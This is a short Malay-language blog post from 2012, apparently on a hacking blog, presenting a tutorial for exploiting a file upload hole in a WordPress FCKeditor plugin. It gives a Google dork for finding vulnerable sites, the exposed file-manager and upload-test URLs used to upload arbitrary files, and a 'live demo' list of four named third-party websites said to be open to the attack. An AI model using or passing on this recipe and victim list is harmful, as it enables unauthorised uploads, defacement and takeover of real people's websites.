Wednesday, 29 August 2012

New Wordpress FCKeditor File Upload Vulnerability


Assalamualaikum dan salam sejahtera.Maaf la sebab lama tak tulis entry tutorial.sibuk beraya!hoho xD
Baiklah entry kali ini aku nak share dengan korang exploit fckeditor untuk wordpress yang baru.sebelum ni pun dah ada kan?tapi yang ini yang lain pulak :)

1. Mula-mula search google dork :
inurl:"wp-content/plugins/fckeditor"


2. Cari salah satu laman web dalam result dan masukkan salah satu exploit dibawah :

Exploit :
  • http://target.com/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html
  • http://target.com/wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

3. Link file akan diberi selepas upload.

Live demo :

http://rentanice.com/booking/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://sainttimothy.org/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://lifesaving.ca/blog/wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html http://knike.fmf-radio.com/wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html

Itu saja untuk entry kali ini.Assalamualaikum.


Item Reviewed: New Wordpress FCKeditor File Upload Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com